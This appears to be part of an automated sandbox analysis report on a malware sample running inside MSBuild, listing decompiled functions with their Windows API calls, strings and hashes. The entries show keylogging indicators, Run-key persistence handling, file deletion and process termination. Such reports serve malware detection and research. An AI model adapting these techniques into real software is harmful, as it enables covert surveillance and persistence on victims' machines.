                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFreeHeapLast_free
                                                                                                                        • String ID: `@$`@
                                                                                                                        • API String ID: 1353095263-20545824
                                                                                                                        • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                        • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                                                                                        • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                                                                                        • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                                                                                        Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: State
                                                                                                                        • String ID: [CtrlL]$[CtrlR]
                                                                                                                        • API String ID: 1649606143-2446555240
                                                                                                                        • Opcode ID: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                        • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                                                                                        • Opcode Fuzzy Hash: d3bfbbd6b4e89cd63980a9ff1b49381952101389b4aa81d5fd12017d0c3b90ad
                                                                                                                        • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                        Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                        • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                        Strings
                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteOpenValue
                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                        • API String ID: 2654517830-1051519024
                                                                                                                        • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                        • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                                                                                        • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                                                                                        • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                                                                                        Function 0040AF77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                        • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteDirectoryFileRemove
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 3325800564-4028850238
                                                                                                                        • Opcode ID: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                        • Instruction ID: b68931c7331ddc333ece9e06749e281aefc344294653c9eba2f2de372e339d66
                                                                                                                        • Opcode Fuzzy Hash: b246b6ffa53a22d2799d5431088e9539915b729032b3d26a74de246411d0112c
                                                                                                                        • Instruction Fuzzy Hash: FEE046715112108BC610AB31EC44AEBB398AB05316F00487FF8D3A36A1DE38A988CA98
                                                                                                                        Function 00411699 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13synchronizationCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                        • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ObjectProcessSingleTerminateWait
                                                                                                                        • String ID: pth_unenc
                                                                                                                        • API String ID: 1872346434-4028850238
                                                                                                                        • Opcode ID: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                        • Instruction ID: 4302d9c34f7b4dbdac7fc8682473a51625df35810590c52ad239c14707b44b4b
                                                                                                                        • Opcode Fuzzy Hash: 0bcc8583bbfeaf574487765c88b71504591df5916e82e2463f0204abfb9b1fb3
                                                                                                                        • Instruction Fuzzy Hash: C1D0C938559211AFD7614B68BC08B453B6AA745222F108277F828413F1C72598A4AE1C
                                                                                                                        Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                                                                                        • GetLastError.KERNEL32 ref: 0043FB02
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1717984340-0
                                                                                                                        • Opcode ID: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                        • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                                                                                        • Opcode Fuzzy Hash: a3a9a9c7793c2081db5377885f607edf127f94d6c053b0090e31d102b176707d
                                                                                                                        • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759